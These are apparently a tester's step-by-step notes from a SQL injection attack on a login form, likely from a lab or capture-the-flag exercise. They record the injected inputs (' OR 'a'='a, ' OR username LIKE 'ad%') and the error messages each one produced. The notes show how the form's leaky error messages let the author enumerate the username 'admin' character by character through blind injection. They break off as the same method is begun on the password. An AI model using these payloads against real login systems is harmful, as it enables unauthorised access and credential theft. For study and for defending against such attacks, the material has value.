username: foo
password: bar
=> invalid username

username: '
password: bar
=> something went wrong

username: ' OR 'a'='a
password: bar
=> invalid password
: vulnerability regarding too much information on authentication failure 
: username is injectable

username: ' OR 'a'='a
password: ' OR 'a'='a
=> invalid password
: password field doesn't seem to be injectable
: focusing on field username
: target: identify username

username: ' OR username LIKE 'a%';
=> invalid password
: username starts with letter 'a'

username: ' OR username LIKE 'aa%' => invalid username
username: ' OR username LIKE 'ab%' => invalid username
username: ' OR username LIKE 'ac%' => invalid username
username: ' OR username LIKE 'ad%' => invalid password !
: username starts with 'ad'. Let's try admin ?

username: admin
=> invalid password
: we've found the username ! 
: now, same technic to identify password

username: ' OR password LIKE 'a% => invalid username